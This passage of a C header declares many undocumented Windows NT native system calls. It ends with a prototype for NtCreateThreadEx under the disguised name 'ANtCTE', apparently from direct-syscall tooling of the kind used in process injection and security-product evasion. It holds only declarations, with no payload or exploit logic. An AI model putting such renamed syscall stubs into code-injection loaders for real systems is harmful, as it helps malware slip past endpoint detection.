OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG LengthNeeded);\r\n\r\nEXTERN_C NTSTATUS NtQuerySecurityPolicy(\r\n\tIN ULONG_PTR UnknownParameter1,\r\n\tIN ULONG_PTR UnknownParameter2,\r\n\tIN ULONG_PTR UnknownParameter3,\r\n\tIN ULONG_PTR UnknownParameter4,\r\n\tIN ULONG_PTR UnknownParameter5,\r\n\tIN ULONG_PTR UnknownParameter6);\r\n\r\nEXTERN_C NTSTATUS NtQuerySemaphore(\r\n\tIN HANDLE SemaphoreHandle,\r\n\tIN 
SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,\r\n\tOUT PVOID SemaphoreInformation,\r\n\tIN ULONG SemaphoreInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySymbolicLinkObject(\r\n\tIN HANDLE LinkHandle,\r\n\tIN OUT PUNICODE_STRING LinkTarget,\r\n\tOUT PULONG ReturnedLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemEnvironmentValue(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tOUT PVOID VariableValue,\r\n\tIN ULONG ValueLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemEnvironmentValueEx(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tIN LPGUID VendorGuid,\r\n\tOUT PVOID Value OPTIONAL,\r\n\tIN OUT PULONG ValueLength,\r\n\tOUT PULONG Attributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemInformationEx(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN PVOID InputBuffer,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID SystemInformation OPTIONAL,\r\n\tIN ULONG SystemInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryTimerResolution(\r\n\tOUT PULONG MaximumTime,\r\n\tOUT PULONG MinimumTime,\r\n\tOUT PULONG CurrentTime);\r\n\r\nEXTERN_C NTSTATUS NtQueryWnfStateData(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PCWNF_TYPE_ID TypeId OPTIONAL,\r\n\tIN PVOID ExplicitScope OPTIONAL,\r\n\tOUT PWNF_CHANGE_STAMP ChangeStamp,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN OUT PULONG BufferSize);\r\n\r\nEXTERN_C NTSTATUS NtQueryWnfStateNameInformation(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PCWNF_TYPE_ID NameInfoClass,\r\n\tIN PVOID ExplicitScope OPTIONAL,\r\n\tOUT PVOID InfoBuffer,\r\n\tIN ULONG InfoBufferSize);\r\n\r\nEXTERN_C NTSTATUS NtQueueApcThreadEx(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN HANDLE UserApcReserveHandle OPTIONAL,\r\n\tIN PKNORMAL_ROUTINE ApcRoutine,\r\n\tIN PVOID ApcArgument1 OPTIONAL,\r\n\tIN PVOID ApcArgument2 OPTIONAL,\r\n\tIN PVOID ApcArgument3 OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRaiseException(\r\n\tIN 
PEXCEPTION_RECORD ExceptionRecord,\r\n\tIN PCONTEXT ContextRecord,\r\n\tIN BOOLEAN FirstChance);\r\n\r\nEXTERN_C NTSTATUS NtRaiseHardError(\r\n\tIN NTSTATUS ErrorStatus,\r\n\tIN ULONG NumberOfParameters,\r\n\tIN ULONG UnicodeStringParameterMask,\r\n\tIN PULONG_PTR Parameters,\r\n\tIN ULONG ValidResponseOptions,\r\n\tOUT PULONG Response);\r\n\r\nEXTERN_C NTSTATUS NtReadOnlyEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRecoverEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PVOID EnlistmentKey OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRecoverResourceManager(\r\n\tIN HANDLE ResourceManagerHandle);\r\n\r\nEXTERN_C NTSTATUS NtRecoverTransactionManager(\r\n\tIN HANDLE TransactionManagerHandle);\r\n\r\nEXTERN_C NTSTATUS NtRegisterProtocolAddressInformation(\r\n\tIN HANDLE ResourceManager,\r\n\tIN LPGUID ProtocolId,\r\n\tIN ULONG ProtocolInformationSize,\r\n\tIN PVOID ProtocolInformation,\r\n\tIN ULONG CreateOptions OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRegisterThreadTerminatePort(\r\n\tIN HANDLE PortHandle);\r\n\r\nEXTERN_C NTSTATUS NtReleaseKeyedEvent(\r\n\tIN HANDLE KeyedEventHandle,\r\n\tIN PVOID KeyValue,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtReleaseWorkerFactoryWorker(\r\n\tIN HANDLE WorkerFactoryHandle);\r\n\r\nEXTERN_C NTSTATUS NtRemoveIoCompletionEx(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tOUT PFILE_IO_COMPLETION_INFORMATION IoCompletionInformation,\r\n\tIN ULONG Count,\r\n\tOUT PULONG NumEntriesRemoved,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tIN BOOLEAN Alertable);\r\n\r\nEXTERN_C NTSTATUS NtRemoveProcessDebug(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE DebugObjectHandle);\r\n\r\nEXTERN_C NTSTATUS NtRenameKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING NewName);\r\n\r\nEXTERN_C NTSTATUS NtRenameTransactionManager(\r\n\tIN PUNICODE_STRING LogFileName,\r\n\tIN LPGUID ExistingTransactionManagerGuid);\r\n\r\nEXTERN_C 
NTSTATUS NtReplaceKey(\r\n\tIN POBJECT_ATTRIBUTES NewFile,\r\n\tIN HANDLE TargetHandle,\r\n\tIN POBJECT_ATTRIBUTES OldFile);\r\n\r\nEXTERN_C NTSTATUS NtReplacePartitionUnit(\r\n\tIN PUNICODE_STRING TargetInstancePath,\r\n\tIN PUNICODE_STRING SpareInstancePath,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtReplyWaitReplyPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN OUT PPORT_MESSAGE ReplyMessage);\r\n\r\nEXTERN_C NTSTATUS NtRequestPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE RequestMessage);\r\n\r\nEXTERN_C NTSTATUS NtResetEvent(\r\n\tIN HANDLE EventHandle,\r\n\tOUT PULONG PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtResetWriteWatch(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN ULONG RegionSize);\r\n\r\nEXTERN_C NTSTATUS NtRestoreKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE FileHandle,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtResumeProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtRevertContainerImpersonation();\r\n\r\nEXTERN_C NTSTATUS NtRollbackComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRollbackEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRollbackRegistryTransaction(\r\n\tIN HANDLE RegistryHandle,\r\n\tIN BOOL Wait);\r\n\r\nEXTERN_C NTSTATUS NtRollbackTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN BOOLEAN Wait);\r\n\r\nEXTERN_C NTSTATUS NtRollforwardTransactionManager(\r\n\tIN HANDLE TransactionManagerHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSaveKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE FileHandle);\r\n\r\nEXTERN_C NTSTATUS NtSaveKeyEx(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE FileHandle,\r\n\tIN ULONG Format);\r\n\r\nEXTERN_C NTSTATUS NtSaveMergedKeys(\r\n\tIN HANDLE HighPrecedenceKeyHandle,\r\n\tIN HANDLE LowPrecedenceKeyHandle,\r\n\tIN HANDLE FileHandle);\r\n\r\nEXTERN_C NTSTATUS 
NtSecureConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN PUNICODE_STRING PortName,\r\n\tIN PSECURITY_QUALITY_OF_SERVICE SecurityQos,\r\n\tIN OUT PPORT_SECTION_WRITE ClientView OPTIONAL,\r\n\tIN PSID RequiredServerSid OPTIONAL,\r\n\tIN OUT PPORT_SECTION_READ ServerView OPTIONAL,\r\n\tOUT PULONG MaxMessageLength OPTIONAL,\r\n\tIN OUT PVOID ConnectionInformation OPTIONAL,\r\n\tIN OUT PULONG ConnectionInformationLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSerializeBoot();\r\n\r\nEXTERN_C NTSTATUS NtSetBootEntryOrder(\r\n\tIN PULONG Ids,\r\n\tIN ULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtSetBootOptions(\r\n\tIN PBOOT_OPTIONS BootOptions,\r\n\tIN ULONG FieldsToChange);\r\n\r\nEXTERN_C NTSTATUS NtSetCachedSigningLevel(\r\n\tIN ULONG Flags,\r\n\tIN SE_SIGNING_LEVEL InputSigningLevel,\r\n\tIN PHANDLE SourceFiles,\r\n\tIN ULONG SourceFileCount,\r\n\tIN HANDLE TargetFile OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetCachedSigningLevel2(\r\n\tIN ULONG Flags,\r\n\tIN ULONG InputSigningLevel,\r\n\tIN PHANDLE SourceFiles,\r\n\tIN ULONG SourceFileCount,\r\n\tIN HANDLE TargetFile OPTIONAL,\r\n\tIN PVOID LevelInformation OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PCONTEXT Context);\r\n\r\nEXTERN_C NTSTATUS NtSetDebugFilterState(\r\n\tIN ULONG ComponentId,\r\n\tIN ULONG Level,\r\n\tIN BOOLEAN State);\r\n\r\nEXTERN_C NTSTATUS NtSetDefaultHardErrorPort(\r\n\tIN HANDLE PortHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetDefaultLocale(\r\n\tIN BOOLEAN UserProfile,\r\n\tIN LCID DefaultLocaleId);\r\n\r\nEXTERN_C NTSTATUS NtSetDefaultUILanguage(\r\n\tIN LANGID DefaultUILanguageId);\r\n\r\nEXTERN_C NTSTATUS NtSetDriverEntryOrder(\r\n\tIN PULONG Ids,\r\n\tIN PULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtSetEaFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_FULL_EA_INFORMATION EaBuffer,\r\n\tIN ULONG EaBufferSize);\r\n\r\nEXTERN_C NTSTATUS NtSetHighEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS 
NtSetHighWaitLowEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetIRTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PLARGE_INTEGER DueTime OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationDebugObject(\r\n\tIN HANDLE DebugObject,\r\n\tIN DEBUGOBJECTINFOCLASS InformationClass,\r\n\tIN PVOID Information,\r\n\tIN ULONG InformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,\r\n\tIN PVOID EnlistmentInformation,\r\n\tIN ULONG EnlistmentInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN JOBOBJECTINFOCLASS JobObjectInformationClass,\r\n\tIN PVOID JobObjectInformation,\r\n\tIN ULONG JobObjectInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN KEY_SET_INFORMATION_CLASS KeySetInformationClass,\r\n\tIN PVOID KeySetInformation,\r\n\tIN ULONG KeySetInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationResourceManager(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,\r\n\tIN PVOID ResourceManagerInformation,\r\n\tIN ULONG ResourceManagerInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationSymbolicLink(\r\n\tIN HANDLE Handle,\r\n\tIN ULONG Class,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG BufferLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN TOKEN_INFORMATION_CLASS TokenInformationClass,\r\n\tIN PVOID TokenInformation,\r\n\tIN ULONG TokenInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN TRANSACTION_INFORMATION_CLASS TransactionInformationClass,\r\n\tIN PVOID TransactionInformation,\r\n\tIN ULONG TransactionInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationTransactionManager(\r\n\tIN HANDLE TmHandle,\r\n\tIN TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass,\r\n\tIN PVOID TransactionManagerInformation,\r\n\tIN ULONG TransactionManagerInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass,\r\n\tIN ULONG_PTR NumberOfEntries,\r\n\tIN PMEMORY_RANGE_ENTRY VirtualAddresses,\r\n\tIN PVOID VmInformation,\r\n\tIN ULONG VmInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationWorkerFactory(\r\n\tIN HANDLE WorkerFactoryHandle,\r\n\tIN WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,\r\n\tIN PVOID WorkerFactoryInformation,\r\n\tIN ULONG WorkerFactoryInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetIntervalProfile(\r\n\tIN ULONG Interval,\r\n\tIN KPROFILE_SOURCE Source);\r\n\r\nEXTERN_C NTSTATUS NtSetIoCompletion(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN ULONG CompletionKey,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN NTSTATUS CompletionStatus,\r\n\tIN ULONG NumberOfBytesTransfered);\r\n\r\nEXTERN_C NTSTATUS NtSetIoCompletionEx(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN HANDLE IoCompletionPacketHandle,\r\n\tIN PVOID KeyContext OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tIN NTSTATUS IoStatus,\r\n\tIN ULONG_PTR IoStatusInformation);\r\n\r\nEXTERN_C NTSTATUS NtSetLdtEntries(\r\n\tIN ULONG Selector0,\r\n\tIN ULONG Entry0Low,\r\n\tIN ULONG Entry0Hi,\r\n\tIN ULONG Selector1,\r\n\tIN ULONG Entry1Low,\r\n\tIN ULONG Entry1Hi);\r\n\r\nEXTERN_C NTSTATUS NtSetLowEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetLowWaitHighEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetQuotaInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_USER_QUOTA_INFORMATION Buffer,\r\n\tIN ULONG Length);\r\n\r\nEXTERN_C NTSTATUS NtSetSecurityObject(\r\n\tIN HANDLE ObjectHandle,\r\n\tIN SECURITY_INFORMATION SecurityInformationClass,\r\n\tIN PSECURITY_DESCRIPTOR 
DescriptorBuffer);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemEnvironmentValue(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tIN PUNICODE_STRING Value);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemEnvironmentValueEx(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tIN LPGUID VendorGuid,\r\n\tIN PVOID Value OPTIONAL,\r\n\tIN ULONG ValueLength,\r\n\tIN ULONG Attributes);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemInformation(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN PVOID SystemInformation,\r\n\tIN ULONG SystemInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemPowerState(\r\n\tIN POWER_ACTION SystemAction,\r\n\tIN SYSTEM_POWER_STATE MinSystemState,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemTime(\r\n\tIN PLARGE_INTEGER SystemTime,\r\n\tOUT PLARGE_INTEGER PreviousTime OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetThreadExecutionState(\r\n\tIN EXECUTION_STATE ExecutionState,\r\n\tOUT PEXECUTION_STATE PreviousExecutionState);\r\n\r\nEXTERN_C NTSTATUS NtSetTimer2(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PLARGE_INTEGER DueTime,\r\n\tIN PLARGE_INTEGER Period OPTIONAL,\r\n\tIN PT2_SET_PARAMETERS Parameters);\r\n\r\nEXTERN_C NTSTATUS NtSetTimerEx(\r\n\tIN HANDLE TimerHandle,\r\n\tIN TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,\r\n\tIN OUT PVOID TimerSetInformation OPTIONAL,\r\n\tIN ULONG TimerSetInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetTimerResolution(\r\n\tIN ULONG DesiredResolution,\r\n\tIN BOOLEAN SetResolution,\r\n\tOUT PULONG CurrentResolution);\r\n\r\nEXTERN_C NTSTATUS NtSetUuidSeed(\r\n\tIN PUCHAR Seed);\r\n\r\nEXTERN_C NTSTATUS NtSetVolumeInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID FileSystemInformation,\r\n\tIN ULONG Length,\r\n\tIN FSINFOCLASS FileSystemInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtSetWnfProcessNotificationEvent(\r\n\tIN HANDLE NotificationEvent);\r\n\r\nEXTERN_C NTSTATUS NtShutdownSystem(\r\n\tIN SHUTDOWN_ACTION Action);\r\n\r\nEXTERN_C NTSTATUS 
NtShutdownWorkerFactory(\r\n\tIN HANDLE WorkerFactoryHandle,\r\n\tIN OUT PLONG PendingWorkerCount);\r\n\r\nEXTERN_C NTSTATUS NtSignalAndWaitForSingleObject(\r\n\tIN HANDLE hObjectToSignal,\r\n\tIN HANDLE hObjectToWaitOn,\r\n\tIN BOOLEAN bAlertable,\r\n\tIN PLARGE_INTEGER dwMilliseconds OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSinglePhaseReject(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtStartProfile(\r\n\tIN HANDLE ProfileHandle);\r\n\r\nEXTERN_C NTSTATUS NtStopProfile(\r\n\tIN HANDLE ProfileHandle);\r\n\r\nEXTERN_C NTSTATUS NtSubscribeWnfStateChange(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN WNF_CHANGE_STAMP ChangeStamp OPTIONAL,\r\n\tIN ULONG EventMask,\r\n\tOUT PLARGE_INTEGER SubscriptionId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSuspendProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtSuspendThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tOUT PULONG PreviousSuspendCount);\r\n\r\nEXTERN_C NTSTATUS NtSystemDebugControl(\r\n\tIN DEBUG_CONTROL_CODE Command,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtTerminateEnclave(\r\n\tIN PVOID BaseAddress,\r\n\tIN BOOLEAN WaitForThread);\r\n\r\nEXTERN_C NTSTATUS NtTerminateJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN NTSTATUS ExitStatus);\r\n\r\nEXTERN_C NTSTATUS NtTestAlert();\r\n\r\nEXTERN_C NTSTATUS NtThawRegistry();\r\n\r\nEXTERN_C NTSTATUS NtThawTransactions();\r\n\r\nEXTERN_C NTSTATUS NtTraceControl(\r\n\tIN ULONG FunctionCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtTranslateFilePath(\r\n\tIN PFILE_PATH InputFilePath,\r\n\tIN ULONG OutputType,\r\n\tOUT PFILE_PATH OutputFilePath OPTIONAL,\r\n\tIN OUT PULONG OutputFilePathLength 
OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtUmsThreadYield(\r\n\tIN PVOID SchedulerParam);\r\n\r\nEXTERN_C NTSTATUS NtUnloadDriver(\r\n\tIN PUNICODE_STRING DriverServiceName);\r\n\r\nEXTERN_C NTSTATUS NtUnloadKey(\r\n\tIN POBJECT_ATTRIBUTES DestinationKeyName);\r\n\r\nEXTERN_C NTSTATUS NtUnloadKey2(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtUnloadKeyEx(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN HANDLE Event OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtUnlockFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PULARGE_INTEGER ByteOffset,\r\n\tIN PULARGE_INTEGER Length,\r\n\tIN ULONG Key);\r\n\r\nEXTERN_C NTSTATUS NtUnlockVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID* BaseAddress,\r\n\tIN PSIZE_T NumberOfBytesToUnlock,\r\n\tIN ULONG LockType);\r\n\r\nEXTERN_C NTSTATUS NtUnmapViewOfSectionEx(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtUnsubscribeWnfStateChange(\r\n\tIN PCWNF_STATE_NAME StateName);\r\n\r\nEXTERN_C NTSTATUS NtUpdateWnfStateData(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PVOID Buffer OPTIONAL,\r\n\tIN ULONG Length OPTIONAL,\r\n\tIN PCWNF_TYPE_ID TypeId OPTIONAL,\r\n\tIN PVOID ExplicitScope OPTIONAL,\r\n\tIN WNF_CHANGE_STAMP MatchingChangeStamp,\r\n\tIN ULONG CheckStamp);\r\n\r\nEXTERN_C NTSTATUS NtVdmControl(\r\n\tIN VDMSERVICECLASS Service,\r\n\tIN OUT PVOID ServiceData);\r\n\r\nEXTERN_C NTSTATUS NtWaitForAlertByThreadId(\r\n\tIN HANDLE Handle,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForDebugEvent(\r\n\tIN HANDLE DebugObjectHandle,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tOUT PVOID WaitStateChange);\r\n\r\nEXTERN_C NTSTATUS NtWaitForKeyedEvent(\r\n\tIN HANDLE KeyedEventHandle,\r\n\tIN PVOID Key,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForWorkViaWorkerFactory(\r\n\tIN HANDLE 
WorkerFactoryHandle,\r\n\tOUT PVOID MiniPacket);\r\n\r\nEXTERN_C NTSTATUS NtWaitHighEventPair(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtWaitLowEventPair(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtAcquireCMFViewOwnership(\r\n\tOUT BOOLEAN TimeStamp,\r\n\tOUT BOOLEAN TokenTaken,\r\n\tIN BOOLEAN ReplaceExisting);\r\n\r\nEXTERN_C NTSTATUS NtCancelDeviceWakeupRequest(\r\n\tIN HANDLE DeviceHandle);\r\n\r\nEXTERN_C NTSTATUS NtClearAllSavepointsTransaction(\r\n\tIN HANDLE TransactionHandle);\r\n\r\nEXTERN_C NTSTATUS NtClearSavepointTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN ULONG SavePointId);\r\n\r\nEXTERN_C NTSTATUS NtRollbackSavepointTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN ULONG SavePointId);\r\n\r\nEXTERN_C NTSTATUS NtSavepointTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN BOOLEAN Flag,\r\n\tOUT ULONG SavePointId);\r\n\r\nEXTERN_C NTSTATUS NtSavepointComplete(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateSectionEx(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER MaximumSize OPTIONAL,\r\n\tIN ULONG SectionPageProtection,\r\n\tIN ULONG AllocationAttributes,\r\n\tIN HANDLE FileHandle OPTIONAL,\r\n\tIN PMEM_EXTENDED_PARAMETER ExtendedParameters,\r\n\tIN ULONG ExtendedParametersCount);\r\n\r\nEXTERN_C NTSTATUS NtCreateCrossVmEvent();\r\n\r\nEXTERN_C NTSTATUS NtGetPlugPlayEvent(\r\n\tIN HANDLE EventHandle,\r\n\tIN PVOID Context OPTIONAL,\r\n\tOUT PPLUGPLAY_EVENT_BLOCK EventBlock,\r\n\tIN ULONG EventBufferSize);\r\n\r\nEXTERN_C NTSTATUS NtListTransactions();\r\n\r\nEXTERN_C NTSTATUS NtMarshallTransaction();\r\n\r\nEXTERN_C NTSTATUS NtPullTransaction();\r\n\r\nEXTERN_C NTSTATUS NtReleaseCMFViewOwnership();\r\n\r\nEXTERN_C NTSTATUS NtWaitForWnfNotifications();\r\n\r\nEXTERN_C NTSTATUS NtStartTm();\r\n\r\nEXTERN_C NTSTATUS 
NtSetInformationProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PROCESSINFOCLASS ProcessInformationClass,\r\n\tIN PVOID ProcessInformation,\r\n\tIN ULONG ProcessInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtRequestDeviceWakeup(\r\n\tIN HANDLE DeviceHandle);\r\n\r\nEXTERN_C NTSTATUS NtRequestWakeupLatency(\r\n\tIN ULONG LatencyTime);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemTime(\r\n\tOUT PLARGE_INTEGER SystemTime);\r\n\r\nEXTERN_C NTSTATUS NtManageHotPatch(\r\n\tIN ULONG UnknownParameter1,\r\n\tIN ULONG UnknownParameter2,\r\n\tIN ULONG UnknownParameter3,\r\n\tIN ULONG UnknownParameter4);\r\n\r\nEXTERN_C NTSTATUS NtContinueEx(\r\n\tIN PCONTEXT ContextRecord,\r\n\tIN PKCONTINUE_ARGUMENT ContinueArgument);\r\n\r\nEXTERN_C NTSTATUS RtlCreateUserThread(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,\r\n\tIN BOOLEAN CreateSuspended,\r\n\tIN ULONG StackZeroBits,\r\n\tIN OUT PULONG StackReserved,\r\n\tIN OUT PULONG StackCommit,\r\n\tIN PVOID StartAddress,\r\n\tIN PVOID StartParameter OPTIONAL,\r\n\tOUT PHANDLE ThreadHandle,\r\n\tOUT PCLIENT_ID ClientID);\r\n\r\n#endif\r\n\r\n\r\n// Renamed prototype of NtCreateThreadEx: the same eleven parameters, in the same order, as the real syscall.\r\nEXTERN_C NTSTATUS ANtCTE(\r\n\tHANDLE* pHandle,\r\n\tACCESS_MASK DesiredAccess,\r\n\tPVOID pAttr,\r\n\tHANDLE hProc,\r\n\tPVOID pFunc,\r\n\tPVOID pArg,\r\n\tULONG Flags,\r\n\tSIZE_T ZeroBits,\r\n\tSIZE_T StackSize,\r\n\tSIZE_T 